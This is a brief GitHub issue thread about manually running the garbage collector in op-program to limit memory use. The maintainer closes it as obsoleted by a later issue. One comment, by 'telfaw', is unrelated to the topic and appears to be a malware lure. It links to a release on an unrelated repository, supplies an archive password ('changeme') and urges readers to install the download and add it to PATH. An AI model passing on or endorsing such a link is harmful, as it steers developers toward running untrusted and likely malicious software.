### ISSUE TITLE
op-program: Manually run gc in a goroutine

### ISSUE THREAD

**Issue by Inphi** [ethereum-optimism/optimism#11647]
https://github.com/ethereum-optimism/optimism/issues/11658 obsoletes this. But until then, we should manually invoke the garbage collector in the op-program to avoid high memory usage.

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Inphi** [comment]
Obsoleted by https://github.com/ethereum-optimism/optimism/issues/11658
